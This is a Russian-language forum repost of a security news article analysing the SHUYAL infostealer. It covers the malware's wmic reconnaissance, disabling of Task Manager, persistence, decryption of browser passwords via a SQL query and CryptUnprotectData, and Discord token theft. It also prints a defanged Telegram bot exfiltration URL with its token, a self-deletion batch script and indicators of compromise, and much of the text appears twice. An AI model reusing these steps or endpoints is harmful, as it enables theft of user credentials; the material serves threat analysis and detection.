- 19,417
- 40
- 8 Ноя 2022
Вредонос нового уровня наглости.
Исследователи из Для просмотра ссылки Войдиили Зарегистрируйся задокументировали ранее неизвестный Для просмотра ссылки Войди или Зарегистрируйся , отличающийся нестандартным сочетанием глубокой разведки системы, обширного сбора учётных данных и агрессивных методов уклонения от обнаружения. Экземпляр был обнаружен под именем SHUYAL — по уникальному пути отладочной информации (PDB path), в котором также фигурирует имя пользователя «sheepy». Это программное обеспечение ориентировано на массовую кражу браузерных паролей, токенов Discord, данных буфера обмена и скриншотов, с последующей отправкой через Для просмотра ссылки Войди или Зарегистрируйся . Все артефакты после завершения работы удаляются, включая саму вредоносную программу.
Сбор информации начинается сразу после запуска. SHUYAL создаёт анонимный канал связи в системе с помощью вызова API CreatePipe, который позже используется для чтения вывода от дочерних процессов. В числе первых команд — серия вызовов wmic, с помощью которых программа получает модель и серийный номер жёстких дисков (wmic diskdrive get model,serialnumber), описание и ID клавиатуры (wmic path Win32_Keyboard get Description,DeviceID), данные о мыши (wmic path Win32_PointingDevice get Description,PNPDeviceID, вызывается дважды) и информацию о подключённом мониторе (wmic path Win32_DesktopMonitor get Description,PNPDeviceID). Последняя команда wmic get name завершается с ошибкой, так как синтаксис неполный.
SHUYAL также извлекает путь до фонового изображения рабочего стола пользователя, запуская PowerShell со следующей командой:
(Get-ItemProperty 'HKCU:\Control Panel\Desktop').Wallpaper
Параллельно вредонос отслеживает процессы в системе и, если обнаруживает запущенный диспетчер задач (Taskmgr.exe), немедленно завершает его с помощью API TerminateProcess. Затем редактируется системный реестр: в ключ HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System добавляется параметр DisableTaskMgr со значением 1, тем самым запрещая повторный запуск диспетчера. Это изменение производится через PowerShell, как показано в отчёте.
SHUYAL получает дескриптор стандартного выходного устройства и активирует режим ENABLE_ECHO_INPUT, меняя конфигурацию консоли. Это делается явно через Windows API, что может быть использовано как один из индикаторов вредоносного поведения.
Для закрепления в системе SHUYAL использует API SHGetSpecialFolderPathA с параметром 0x7 (CSIDL_STARTUP), чтобы определить расположение папки автозагрузки пользователя. Затем копирует себя в эту директорию с помощью функции CopyFileA. В коде присутствуют строки, подтверждающие как успешное, так и неудачное выполнение этой операции.
После разведки и установления постоянства начинается сбор чувствительных данных. Программа фокусируется на Для просмотра ссылки Войдиили Зарегистрируйся . Всего целевых приложений — 19, включая:
SELECT origin_url, username_value, password_value FROM logins
Данные дешифруются через встроенные в Windows механизмы. Сначала из файла Local State извлекается мастер-ключ, закодированный в Base64. Он декодируется и расшифровывается с использованием API CryptUnprotectData. Полученный мастер-ключ применяется для расшифровки паролей из базы. Все данные сохраняются в saved_passwords.txt внутри временной директории runtime\passwords.
История браузера копируется из файла \User Data\Default\History и сохраняется как runtime\history\history.txt. Буфер обмена анализируется через OpenClipboard и GetClipboardData, его содержимое сбрасывается в runtime\clipboard\clipboard.txt. Снимок экрана делается с помощью GdiplusStartup, BitBlt и GdipSaveImageToFile, результат сохраняется под именем runtime\pic\ss.png.
Также SHUYAL охотится за токенами Discord, включая обычный клиент, Discord Canary и PTB-версию. Найденные токены записываются в runtime\browser\tokens.txt. Кроме того, создаётся runtime\browser\debug_log.txt, в котором логируются действия по работе с браузерами, найденные базы, успешность дешифровки и прочая отладочная информация.
Чтобы сохранить следы своих действий, вредонос удаляет данные, ранее выгруженные в runtime-директорию, а также следы изменений в базах самих браузеров. Перед этим всё содержимое временной папки runtime архивируется с помощью PowerShell:
Compress-Archive -Path 'C:\Users\\AppData\Local\Temp\runtime\*' -DestinationPath 'C:\Users\\AppData\Local\Temp\runtime.zip' -Force
Архив runtime.zip отправляется на Telegram-бота по адресу:
hxxps[:]//api.telegram[.]org/bot7522684505:AAEODeii83B_nlpLi0bUQTnOtVdjc8yHfjQ/sendDocument?chat_id=-1002503889864
Для сетевой коммуникации в процессе также используется WSAEnumNetworkEvents — функция, позволяющая определять активность сокетов. Это может быть частью логики ожидания соединения или проверки сетевой доступности перед передачей данных.
После завершения всех операций SHUYAL инициирует самоуничтожение. Создаётся BAT-скрипт util.bat, содержащий команды удаления:
@Echo off
timeout /t 3 /nobreak > NUL
del "SHUYAL.exe"
rd /s /q "%TEMP%\runtime"
exit
Он сохраняется на диск и запускается как финальный этап работы. Таким образом, программа не оставляет почти никаких следов на файловой системе жертвы.
Все поведенческие индикаторы зафиксированы в отчёте Hybrid Analysis. Исследователи подчёркивают, что SHUYAL демонстрирует уверенный переход от простых кроссплатформенных стилеров к модульным автономным решениям, способным действовать быстро, агрессивно и незаметно. Благодаря Telegram в качестве канала передачи, злоумышленник получает немедленный доступ к данным, а механизмы зачистки позволяют избежать последующего анализа уже после завершения атаки.
<strong>IOC и технические артефакты:</strong>
<strong>SHA256:</strong>
810d4850ee216df639648a37004a0d4d1275a194924fa53312d3403be97edf5c
<strong>Созданные файлы:</strong>
C:\Users\\AppData\Local\Temp\runtime\browser\debug_log.txt
C:\Users\\AppData\Local\Temp\runtime\browser\tokens.txt
C:\Users\\AppData\Local\Temp\runtime\clipboard\clipboard.txt
C:\Users\\AppData\Local\Temp\runtime\history\history.txt
C:\Users\\AppData\Local\Temp\runtime\passwords\saved_passwords.txt
C:\Users\\AppData\Local\Temp\runtime\pic\ss.png
C:\Users\\AppData\Local\Temp\runtime.zip
util.bat
<strong>Вызовы процессов:</strong>
wmic diskdrive get model,serialnumber
wmic path Win32_Keyboard get Description,DeviceID
wmic path Win32_PointingDevice get Description,PNPDeviceID
wmic path Win32_DesktopMonitor get Description,PNPDeviceID
wmic get name
powershell -command "(Get-ItemProperty 'HKCU:\Control Panel\Desktop').Wallpaper"
powershell -Command "Compress-Archive …"
SHUYAL — типичный представитель современного поколения Для просмотра ссылки Войдиили Зарегистрируйся , в котором сочетание модульности, агрессивной очистки следов и прямой доставки через Telegram делает его особенно опасным для плохо защищённых систем. Несмотря на множество технических приёмов, его ключевая задача — кража учётных данных и быстрая их передача злоумышленнику. Подобные образцы подчёркивают необходимость комплексного подхода к защите конечных точек: простое Для просмотра ссылки Войди или Зарегистрируйся ПО зачастую не способно своевременно отследить такие атаки, особенно если они тщательно избегают сигнатурных срабатываний.
Исследователи из Для просмотра ссылки Войди
Сбор информации начинается сразу после запуска. SHUYAL создаёт анонимный канал связи в системе с помощью вызова API CreatePipe, который позже используется для чтения вывода от дочерних процессов. В числе первых команд — серия вызовов wmic, с помощью которых программа получает модель и серийный номер жёстких дисков (wmic diskdrive get model,serialnumber), описание и ID клавиатуры (wmic path Win32_Keyboard get Description,DeviceID), данные о мыши (wmic path Win32_PointingDevice get Description,PNPDeviceID, вызывается дважды) и информацию о подключённом мониторе (wmic path Win32_DesktopMonitor get Description,PNPDeviceID). Последняя команда wmic get name завершается с ошибкой, так как синтаксис неполный.
SHUYAL также извлекает путь до фонового изображения рабочего стола пользователя, запуская PowerShell со следующей командой:
(Get-ItemProperty 'HKCU:\Control Panel\Desktop').Wallpaper
Параллельно вредонос отслеживает процессы в системе и, если обнаруживает запущенный диспетчер задач (Taskmgr.exe), немедленно завершает его с помощью API TerminateProcess. Затем редактируется системный реестр: в ключ HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System добавляется параметр DisableTaskMgr со значением 1, тем самым запрещая повторный запуск диспетчера. Это изменение производится через PowerShell, как показано в отчёте.
SHUYAL получает дескриптор стандартного выходного устройства и активирует режим ENABLE_ECHO_INPUT, меняя конфигурацию консоли. Это делается явно через Windows API, что может быть использовано как один из индикаторов вредоносного поведения.
Для закрепления в системе SHUYAL использует API SHGetSpecialFolderPathA с параметром 0x7 (CSIDL_STARTUP), чтобы определить расположение папки автозагрузки пользователя. Затем копирует себя в эту директорию с помощью функции CopyFileA. В коде присутствуют строки, подтверждающие как успешное, так и неудачное выполнение этой операции.
После разведки и установления постоянства начинается сбор чувствительных данных. Программа фокусируется на Для просмотра ссылки Войди
- Chrome
- Edge
- Brave
- Opera
- OperaGX
- Chromium
- Yandex
- Vivaldi
- Tor Browser
- Waterfox
- Epic
- Comodo
- Slimjet
- Coccoc
- Maxthon
- 360browser
- UR Browser
- Avast Secure Browser
- Falkon
SELECT origin_url, username_value, password_value FROM logins
Данные дешифруются через встроенные в Windows механизмы. Сначала из файла Local State извлекается мастер-ключ, закодированный в Base64. Он декодируется и расшифровывается с использованием API CryptUnprotectData. Полученный мастер-ключ применяется для расшифровки паролей из базы. Все данные сохраняются в saved_passwords.txt внутри временной директории runtime\passwords.
История браузера копируется из файла \User Data\Default\History и сохраняется как runtime\history\history.txt. Буфер обмена анализируется через OpenClipboard и GetClipboardData, его содержимое сбрасывается в runtime\clipboard\clipboard.txt. Снимок экрана делается с помощью GdiplusStartup, BitBlt и GdipSaveImageToFile, результат сохраняется под именем runtime\pic\ss.png.
Также SHUYAL охотится за токенами Discord, включая обычный клиент, Discord Canary и PTB-версию. Найденные токены записываются в runtime\browser\tokens.txt. Кроме того, создаётся runtime\browser\debug_log.txt, в котором логируются действия по работе с браузерами, найденные базы, успешность дешифровки и прочая отладочная информация.
Чтобы сохранить следы своих действий, вредонос удаляет данные, ранее выгруженные в runtime-директорию, а также следы изменений в базах самих браузеров. Перед этим всё содержимое временной папки runtime архивируется с помощью PowerShell:
Compress-Archive -Path 'C:\Users\\AppData\Local\Temp\runtime\*' -DestinationPath 'C:\Users\\AppData\Local\Temp\runtime.zip' -Force
Архив runtime.zip отправляется на Telegram-бота по адресу:
hxxps[:]//api.telegram[.]org/bot7522684505:AAEODeii83B_nlpLi0bUQTnOtVdjc8yHfjQ/sendDocument?chat_id=-1002503889864
Для сетевой коммуникации в процессе также используется WSAEnumNetworkEvents — функция, позволяющая определять активность сокетов. Это может быть частью логики ожидания соединения или проверки сетевой доступности перед передачей данных.
После завершения всех операций SHUYAL инициирует самоуничтожение. Создаётся BAT-скрипт util.bat, содержащий команды удаления:
@Echo off
timeout /t 3 /nobreak > NUL
del "SHUYAL.exe"
rd /s /q "%TEMP%\runtime"
exit
Он сохраняется на диск и запускается как финальный этап работы. Таким образом, программа не оставляет почти никаких следов на файловой системе жертвы.
Все поведенческие индикаторы зафиксированы в отчёте Hybrid Analysis. Исследователи подчёркивают, что SHUYAL демонстрирует уверенный переход от простых кроссплатформенных стилеров к модульным автономным решениям, способным действовать быстро, агрессивно и незаметно. Благодаря Telegram в качестве канала передачи, злоумышленник получает немедленный доступ к данным, а механизмы зачистки позволяют избежать последующего анализа уже после завершения атаки.
<strong>IOC и технические артефакты:</strong>
<strong>SHA256:</strong>
810d4850ee216df639648a37004a0d4d1275a194924fa53312d3403be97edf5c
<strong>Созданные файлы:</strong>
C:\Users\\AppData\Local\Temp\runtime\browser\debug_log.txt
C:\Users\\AppData\Local\Temp\runtime\browser\tokens.txt
C:\Users\\AppData\Local\Temp\runtime\clipboard\clipboard.txt
C:\Users\\AppData\Local\Temp\runtime\history\history.txt
C:\Users\\AppData\Local\Temp\runtime\passwords\saved_passwords.txt
C:\Users\\AppData\Local\Temp\runtime\pic\ss.png
C:\Users\\AppData\Local\Temp\runtime.zip
util.bat
<strong>Вызовы процессов:</strong>
wmic diskdrive get model,serialnumber
wmic path Win32_Keyboard get Description,DeviceID
wmic path Win32_PointingDevice get Description,PNPDeviceID
wmic path Win32_DesktopMonitor get Description,PNPDeviceID
wmic get name
powershell -command "(Get-ItemProperty 'HKCU:\Control Panel\Desktop').Wallpaper"
powershell -Command "Compress-Archive …"
SHUYAL — типичный представитель современного поколения Для просмотра ссылки Войди
- Источник новости
- www.securitylab.ru
